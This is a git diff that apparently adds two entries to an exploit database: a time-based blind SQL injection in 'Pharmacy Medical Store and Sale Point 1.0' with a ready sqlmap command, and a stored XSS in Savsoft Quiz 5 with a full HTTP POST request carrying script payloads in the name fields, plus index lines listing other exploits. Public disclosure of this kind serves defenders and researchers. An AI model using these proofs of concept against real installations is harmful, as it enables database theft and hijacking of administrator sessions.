diff --git a/exploits/php/webapps/48752.txt b/exploits/php/webapps/48752.txt new file mode 100644 index 000000000..9bc127fbe --- /dev/null +++ b/exploits/php/webapps/48752.txt @@ -0,0 +1,13 @@ +# Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection +# Exploit Author: Moaaz Taha (0xStorm) +# Date: 2020-08-18 +# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 + +# Description +This parameter "catId" is vulnerable to Time-Based blind SQL injection in this path "/medical/inventeries.php?catID=1" that leads to retrieve all databases. + +#POC +sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catId --dbms=mysql --threads=10 \ No newline at end of file diff --git a/exploits/php/webapps/48753.txt b/exploits/php/webapps/48753.txt new file mode 100644 index 000000000..1e38f29b4 --- /dev/null +++ b/exploits/php/webapps/48753.txt @@ -0,0 +1,40 @@ +# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting +# Date: 2020-07-28 +# Exploit Author: Mayur Parmar(th3cyb3rc0p) +# Vendor Homepage: https://savsoftquiz.com/ +# Software Link: https://github.com/savsofts/savsoftquiz_v5.git +# Version: 5.0 +# Tested on: Windows 10 +# Contact: https://www.linkedin.com/in/th3cyb3rc0p/ + +Stored Cross-site scripting(XSS): +Stored attacks are those where the injected script is permanently stored on the target servers, +such as in a database, in a message forum, visitor log, comment field, etc. +The victim then retrieves the malicious script from the server when it requests the stored information. +Stored XSS is also sometimes referred to as Persistent XSS. + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel, +the XSS triggers and attacker can able to steal the cookie according to the crafted payload. + +Vulnerable Parameters: First Name, Last Name +Steps for reproduce: +1. Goto registration page +2. fill the details. & put payload in First name,Last name +3. Now goto Admin Panel.we can see that our payload gets executed. + +POST /index.php/login/insert_user/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 255 +Origin: http://localhost +Connection: close +Referer: http://localhost/index.php/login/registration/ +Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea +Upgrade-Insecure-Requests: 1 + +email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 042716513..efe4bebaf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42993,3 +42993,5 @@ id,file,description,date,author,type,platform,port 48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware, 48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware, 48751,exploits/hardware/webapps/48751.txt,"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)",2020-08-17,LiquidWorm,webapps,hardware, +48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php, +48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,